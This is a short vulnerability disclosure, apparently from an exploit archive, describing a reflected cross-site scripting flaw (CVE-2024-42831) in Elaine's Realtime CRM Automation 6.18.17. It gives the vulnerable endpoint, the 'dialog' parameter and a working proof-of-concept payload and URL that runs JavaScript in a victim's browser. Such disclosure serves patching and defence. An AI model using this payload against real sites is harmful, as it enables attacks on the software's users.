Headline
Elaine's Realtime CRM Automation 6.18.17 Cross Site Scripting
Elaine’s Realtime CRM Automation version 6.18.17 suffers from a cross site scripting vulnerability.
# Exploit Title: Reflected XSS in Elaine's Realtime CRM Automation v6.18.17# Date: 09/2024# Exploit Author: Haythem Arfaoui (CBTW Team)# Vendor Homepage: https://www.elaine.io/# Software Link:https://www.elaine.io/en/products/elaine-marketing-automation/# Version: 6.18.17 and below# Tested on: Windows, Linux# CVE : CVE-2024-42831# DescriptionA reflected cross-site scripting (XSS) vulnerability in Elaine's RealtimeCRM Automation v6.18.17 allows attackers to execute arbitrary JavaScriptcode in the web browser of a user via injecting a crafted payload into thedialog parameter at wrapper_dialog.php.# Steps to reproduce:1. Navigate to any website that contains Elaine's Realtime CRM Automation2. Navigate to this endpoint: /system/interface/wrapper_dialog.php3. Append the payload *a"%20onafterscriptexecute=alert(document.domain)> *inthe *"dialog*" param and execute the request4. Final URL: /system/interface/wrapper_dialog.php?dialog=a"%20onafterscriptexecute=alert(document.domain)>